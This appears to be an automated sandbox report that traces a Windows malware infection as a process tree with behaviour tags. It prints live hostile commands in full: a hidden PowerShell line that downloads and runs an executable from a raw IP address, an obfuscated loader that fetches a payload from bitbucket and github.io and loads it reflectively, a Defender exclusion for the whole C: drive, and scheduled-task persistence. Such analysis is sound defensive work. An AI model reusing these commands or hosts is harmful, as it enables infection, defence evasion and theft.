                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of SetWindowsHookEx
                                      PID:5908
                                  • C:\Users\Admin\AppData\Local\Temp\10291530101\OkH8IPF.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10291530101\OkH8IPF.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:2136
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                      7⤵
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:2696
                                  • C:\Users\Admin\AppData\Local\Temp\10293650101\weC48Q7.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10293650101\weC48Q7.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:3860
                                    • C:\Users\Admin\AppData\Local\Temp\onefile_3860_133871348500684278\windowscore.exe
                                      C:\Users\Admin\AppData\Local\Temp\10293650101\weC48Q7.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2396
                                  • C:\Users\Admin\AppData\Local\Temp\10293930101\ARxx7NW.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10293930101\ARxx7NW.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Drops file in Program Files directory
                                    PID:2992
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA=
                                      7⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5352
                                    • C:\Program Files\RuntimeApp\0000012631.exe
                                      "C:\Program Files\RuntimeApp\0000012631.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1860
                                  • C:\Users\Admin\AppData\Local\Temp\10297860101\d3jhg_003.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10297860101\d3jhg_003.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: MapViewOfSection
                                    PID:1396
                                    • C:\Windows\SYSTEM32\cmd.exe
                                      cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                      7⤵
                                        PID:6764
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                          8⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4712
                                      • C:\Windows\system32\svchost.exe
                                        "C:\Windows\system32\svchost.exe"
                                        7⤵
                                        • Downloads MZ/PE file
                                        • Adds Run key to start application
                                        PID:5784
                                        • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                          "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                          8⤵
                                          • Executes dropped EXE
                                          PID:6532
                                        • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                          "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                          8⤵
                                          • Deletes itself
                                          • Executes dropped EXE
                                          PID:6900
                                          • C:\Users\Admin\AppData\Local\Temp\{15ac792d-dab2-4e47-ae45-17291d8d4e44}\284b3192.exe
                                            "C:\Users\Admin\AppData\Local\Temp\{15ac792d-dab2-4e47-ae45-17291d8d4e44}\284b3192.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
                                            9⤵
                                            • Executes dropped EXE
                                            • Checks for VirtualBox DLLs, possible anti-VM trick
                                            • System Location Discovery: System Language Discovery
                                            PID:4160
                                            • C:\Users\Admin\AppData\Local\Temp\{513e23c6-994b-4f7c-9900-4572b7330392}\6bd1ca77.exe
                                              C:/Users/Admin/AppData/Local/Temp/{513e23c6-994b-4f7c-9900-4572b7330392}/\6bd1ca77.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
                                              10⤵
                                                PID:6384
                                      • C:\Users\Admin\AppData\Local\Temp\10298350101\tK0oYx3.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10298350101\tK0oYx3.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:1076
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                          7⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:7012
                                      • C:\Users\Admin\AppData\Local\Temp\10300440101\FdqlBTs.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10300440101\FdqlBTs.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        PID:6264
                                        • C:\Windows\SYSTEM32\cmd.exe
                                          cmd.exe /c 1.bat && 2.js
                                          7⤵
                                            PID:2964
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic cpu get name
                                              8⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4476
                                            • C:\Windows\system32\find.exe
                                              find "QEMU"
                                              8⤵
                                                PID:5660
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@HQ@e@B0@C4@a@Bh@GE@a@Bn@GQ@Yw@v@HM@ZQBn@GE@bQBp@C8@bgBp@C4@bwBj@C4@aQBh@GQ@bgB1@Hk@a@Br@Gk@b@Bh@HY@aQBo@HM@Lw@v@Do@cw@n@Cw@I@@n@D@@Jw@s@C@@JwBT@HQ@YQBy@HQ@dQBw@E4@YQBt@GU@Jw@s@C@@JwBS@GU@ZwBB@HM@bQ@n@Cw@I@@n@D@@Jw@p@Ck@fQB9@@==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($dosigo.replace('@','A')));powershell.exe $OWjuxD"
                                                8⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                PID:6512
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.haahgdc/segami/ni.oc.iadnuyhkilavihs//:s', '0', 'StartupName', 'RegAsm', '0'))}}"
                                                  9⤵
                                                  • Blocklisted process makes network request
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious use of SetThreadContext
                                                  PID:316
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                    10⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2424
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10301280121\am_no.cmd" "
                                            6⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:6292
                                            • C:\Windows\SysWOW64\timeout.exe
                                              timeout /t 2
                                              7⤵
                                              • System Location Discovery: System Language Discovery
                                              • Delays execution with timeout.exe
                                              PID:6696
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                              7⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2824
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                8⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • System Location Discovery: System Language Discovery
                                                PID:4328
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                              7⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:3896
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                8⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • System Location Discovery: System Language Discovery
                                                PID:7224
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                              7⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:7404
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                8⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • System Location Discovery: System Language Discovery
                                                PID:7432
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /create /tn "VvMigmawIP4" /tr "mshta \"C:\Temp\MsfxK1aXn.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                              7⤵
                                              • System Location Discovery: System Language Discovery
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:8852
                                            • C:\Windows\SysWOW64\mshta.exe
                                              mshta "C:\Temp\MsfxK1aXn.hta"
                                              7⤵
                                              • Checks computer location settings
                                              • System Location Discovery: System Language Discovery
                                              PID:4248
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                8⤵
                                                • Blocklisted process makes network request
                                                • Command and Scripting Interpreter: PowerShell
                                                • Downloads MZ/PE file
                                                • System Location Discovery: System Language Discovery
                                                PID:9160
                                                • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                  9⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • System Location Discovery: System Language Discovery
                                                  PID:11280
                                          • C:\Users\Admin\AppData\Local\Temp\10301350101\a1f51e7280.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10301350101\a1f51e7280.exe"
                                            6⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            • Checks processor information in registry
                                            PID:7836
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                              7⤵
                                              • Uses browser remote debugging
                                              • Enumerates system info in registry
                                              PID:7068
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffe128dcf8,0x7fffe128dd04,0x7fffe128dd10
                                                8⤵
                                                  PID:13180
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1980,i,12252605847048994118,3914668894761944125,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1964 /prefetch:2
                                                  8⤵
                                                    PID:7640
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1544,i,12252605847048994118,3914668894761944125,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2220 /prefetch:3
                                                    8⤵
                                                      PID:7684
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2348,i,12252605847048994118,3914668894761944125,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2356 /prefetch:8
                                                      8⤵
                                                        PID:7784
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3208,i,12252605847048994118,3914668894761944125,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3220 /prefetch:1
                                                        8⤵
                                                        • Uses browser remote debugging
                                                        PID:8272
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3240,i,12252605847048994118,3914668894761944125,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3356 /prefetch:1
                                                        8⤵
                                                        • Uses browser remote debugging
                                                        PID:8492
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4228,i,12252605847048994118,3914668894761944125,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4280 /prefetch:2
                                                        8⤵
                                                        • Uses browser remote debugging
                                                        PID:8956
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4584,i,12252605847048994118,3914668894761944125,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4564 /prefetch:1
                                                        8⤵
                                                        • Uses browser remote debugging
                                                        PID:10108
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5128,i,12252605847048994118,3914668894761944125,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5116 /prefetch:8
                                                        8⤵
                                                          PID:7448
                                                    • C:\Users\Admin\AppData\Local\Temp\10301360101\FdqlBTs.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10301360101\FdqlBTs.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Adds Run key to start application
                                                      PID:9956
                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                        cmd.exe /c 1.bat && 2.js
                                                        7⤵
                                                          PID:10116
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic cpu get name
                                                            8⤵
